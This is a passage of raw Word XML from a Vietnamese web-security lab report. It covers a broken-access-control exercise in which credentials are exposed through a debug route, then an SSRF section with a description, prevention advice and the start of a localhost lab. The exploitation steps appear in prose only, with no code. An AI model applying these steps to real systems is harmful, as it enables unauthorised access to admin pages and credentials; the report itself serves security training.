      <w:r w:rsidRPr="00FC6546">
        <w:t>Lỗ hổng này xuất phát từ việc kẻ tấn công có thể truy cập vào các trang chỉ dành cho admin và khai thác thông tin từ đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B2B78" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D080FD" w14:textId="7C73A1E9" w:rsidR="0065424E" w:rsidRPr="00FC6546" w:rsidRDefault="00FC6546" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>Tr</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:t>uy cập vào task và nhận thấy rằng</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF143AD" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00B775F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A537A61" wp14:editId="2F8AAABD">
            <wp:extent cx="6115050" cy="1782445"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1334369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69826" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1782445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE0E8C" w14:textId="49E9B92C" w:rsidR="0065424E" w:rsidRDefault="00FC6546" w:rsidP="0065424E">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00B775F7">
        <w:t xml:space="preserve"> Sử dụng gợi ý của đề bài để điều hướng đến route debug để kiểm tra thông tin</w:t>
      </w:r>
      <w:r w:rsidR="0065424E">
        <w:t xml:space="preserve"> đăng nhập</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00B775F7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4114BC" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00B775F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75C4E3C8" wp14:editId="1D6368AB">
            <wp:extent cx="6115050" cy="1488440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="419005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05521" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1488440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C53E27" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B775F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09B32916" wp14:editId="393BF6FA">
            <wp:extent cx="4686541" cy="4845299"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1844050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50125" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686541" cy="4845299"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE0714" w14:textId="26719957" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="00B775F7">
        <w:t xml:space="preserve">Tại đây, phát hiện được thông tin đăng nhập bao gồm </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00B775F7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00B775F7">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00B775F7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04926ADA" w14:textId="44125006" w:rsidR="0065424E" w:rsidRPr="000C053C" w:rsidRDefault="00FC6546" w:rsidP="0065424E">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="000C053C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:t>ăng nhập vào và tiếp tục khai thác.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> NHƯNG…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019E5D8" w14:textId="75701A70" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="000C053C">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FC6546">
        <w:t xml:space="preserve">gặp </w:t>
      </w:r>
      <w:r w:rsidRPr="000C053C">
        <w:t>lỗi ở database</w:t>
      </w:r>
      <w:r w:rsidR="00FC6546">
        <w:t xml:space="preserve"> của hệ thống</w:t>
      </w:r>
      <w:r w:rsidRPr="000C053C">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A26A31" w14:textId="7A301CC6" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="0082663D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7EA152" wp14:editId="30FFB216">
            <wp:extent cx="6115050" cy="1529715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1246010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10663" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1529715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848CE07" w14:textId="6B254ED5" w:rsidR="0065424E" w:rsidRPr="009D0400" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t>High (cao) vì</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> kẻ tấn công có thể truy cập vào các trang chỉ dành cho admin và khai thác thông tin như username và password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210295D" w14:textId="0233E316" w:rsidR="0065424E" w:rsidRPr="00FC6546" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00452300">
        <w:t>Cần thực hiện việc phân quyền hữu hạn cho các tài khoản, ngăn chặn các tài khoản không phải là admin truy cập vào các trang dành cho admin để giảm thiểu nguy cơ từ lỗ hổng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33006F18" w14:textId="77777777" w:rsidR="00FC6546" w:rsidRDefault="00FC6546">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A5F28" w14:textId="1B9B61B7" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc182909871"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A10:2021 – Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="49366C54" w14:textId="3BDDBB5A" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc182909872"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="5F2D44EF" w14:textId="0B8BFC14" w:rsidR="002A3AFF" w:rsidRPr="00FC6546" w:rsidRDefault="00FC6546" w:rsidP="00FC6546">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t>Lỗ hổng SSRF xảy ra bất cứ khi nào ứng dụng web tìm nạp tài nguyên từ xa mà không xác thực URL do ng</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t>ời dùng cung cấp. Nó cho phép kẻ tấn công ép buộc ứng dụng gửi yêu cầu đ</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t>ợc tạo thủ công đến đích không mong muốn. Ứng dụng web dễ bị tấn công th</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t xml:space="preserve">ờng sẽ có đặc quyền đọc, ghi hoặc nhập dữ liệu bằng URL. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E6BCC4" w14:textId="11670EA4" w:rsidR="00151DDF" w:rsidRPr="00FC6546" w:rsidRDefault="00FC6546" w:rsidP="00FC6546">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00FC6546">
        <w:t>Để thực hiện một cuộc tấn công SSRF, kẻ tấn công lạm dụng chức năng trên máy chủ để đọc hoặc cập nhật tài nguyên nội bộ. Sau đó kẻ tấn công có thể buộc ứng dụng gửi yêu cầu truy cập các tài nguyên ngoài ý muốn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6738DC05" w14:textId="05B2C10B" w:rsidR="00401CCB" w:rsidRDefault="00401CCB" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc182909873"/>
      <w:r>
        <w:t>Biện pháp ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="51E4CA9F" w14:textId="3AE067DF" w:rsidR="00401CCB" w:rsidRPr="00FC6546" w:rsidRDefault="00401CCB" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Làm sạch (Sanitize) tất cả các đầu vào của người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để đảm bảo các URL hoặc dữ liệu từ người dùng không chứa các ký tự hoặc chuỗi có thể lợi dụng. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Giả sử người dùng nhập URL để tải hình ảnh từ internet. Thay vì sử dụng URL trực tiếp từ người dùng, hệ thống sẽ kiểm tra và xác thực URL đó xem có phù hợp với định dạng cho phép hay không. Ví dụ, hệ thống chỉ chấp nhận các URL bắt đầu bằng </w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>https://</w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> và thuộc một số domain đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E19F1" w14:textId="613D1742" w:rsidR="00401CCB" w:rsidRPr="00FC6546" w:rsidRDefault="00401CCB" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng “allow list” thay vì “block list”</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để chỉ cho phép truy cập vào các URL hoặc tài nguyên đã được xác định an toàn, thay vì cố gắng chặn các URL không an toàn. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Nếu ứng dụng cần truy cập các dịch vụ API nội bộ, hãy xác định rõ danh sách các URL hoặc IP mà ứng dụng được phép truy cập, ví dụ: chỉ cho phép các yêu cầu đến </w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>https://api.trusted-service.com</w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Không dùng danh sách chặn vì kẻ tấn công có thể tìm cách né tránh các biện pháp chặn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567606C5" w14:textId="77777777" w:rsidR="00401CCB" w:rsidRPr="00FC6546" w:rsidRDefault="00401CCB" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Không gửi phản hồi thô (raw response) trực tiếp cho người dùng/khách hàng</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để đảm bảo rằng các phản hồi từ máy chủ không chứa dữ liệu nhạy cảm có thể bị lạm dụng. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Khi một ứng dụng cần lấy dữ liệu từ một URL do người dùng cung cấp, thay vì gửi trực tiếp kết quả nhận được từ URL đó về cho người dùng, ứng dụng sẽ chỉ gửi các dữ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:lastRenderedPageBreak/>
        <w:t>liệu cần thiết đã được xử lý (như văn bản đơn giản hoặc ảnh đã xác thực). Điều này tránh việc lộ thông tin nhạy cảm hoặc cấu trúc nội bộ của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE93B4" w14:textId="035F9480" w:rsidR="00401CCB" w:rsidRPr="00FC6546" w:rsidRDefault="00401CCB" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Vô hiệu hóa chuyển hướng không mã hóa (HTTP redirections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> để chỉ sử dụng kết nối HTTPS và tránh các chuyển hướng không mã hóa để bảo vệ dữ liệu. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> Nếu ứng dụng </w:t>
      </w:r>
      <w:r w:rsidR="00FC6546" w:rsidRPr="00FC6546">
        <w:t xml:space="preserve">cần </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>phải truy xuất các URL, hãy kiểm tra và ngăn chặn các URL dẫn đến chuyển hướng HTTP không an toàn (HTTP mà không phải HTTPS). Điều này giúp ngăn chặn việc chuyển hướng đến các trang web nguy hiểm mà kẻ tấn công có thể sử dụng để tấn công SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E47468" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc182909874"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="16CAED4A" w14:textId="0EECFCA9" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc182909875"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="43C56C9C" w14:textId="11EFD502" w:rsidR="004E0865" w:rsidRPr="001035B9" w:rsidRDefault="004E0865" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:history="1">
        <w:r w:rsidR="001035B9" w:rsidRPr="001035B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/ssrf_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31182E5A" w14:textId="33EB056C" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00972D34">
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1271AC14" w14:textId="525B5821" w:rsidR="0065424E" w:rsidRPr="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="0065424E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00452300">
        <w:t>Lỗ hổng này xuất phát từ việc kẻ tấn công có thể thực hiện kiểm tra và thay đổi đường truy cập vào code thông qua việc tương tác với các button trên trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE32693" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB94D46" w14:textId="64595956" w:rsidR="0065424E" w:rsidRPr="00FC6546" w:rsidRDefault="00FC6546" w:rsidP="00FC6546">
      <w:r w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC6546">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0065424E" w:rsidRPr="00FC6546">
        <w:t>ruy cập vào task và nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED62FC0" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="005D293D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EF15663" wp14:editId="6B8C05C8">
            <wp:extent cx="6115050" cy="1783715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="2019893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93202" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1783715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2C7DC" w14:textId="103EC408" w:rsidR="0065424E" w:rsidRPr="005D293D" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="005D293D">
        <w:t xml:space="preserve">Tiếp theo </w:t>
      </w:r>
      <w:r w:rsidR="00FC6546">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="005D293D">
        <w:t>khám phá trang này bằng cách nhấn vào các Blog1, Blog2, Blog3, Blog4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EA1BC9" w14:textId="77777777" w:rsidR="0065424E" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r>
        <w:t>Ví dụ như Blog1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D38D832" w14:textId="77777777" w:rsidR="0065424E" w:rsidRPr="005D293D" w:rsidRDefault="0065424E" w:rsidP="0065424E">
      <w:r w:rsidRPr="005D293D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75C6AB96" wp14:editId="61B182EA">
            <wp:extent cx="6115050" cy="1826895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="491128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28784" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1826895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAB867" w14:textId="24CC27FE" w:rsidR="0065424E" w:rsidRDefault="001027BE" w:rsidP="0065424E">
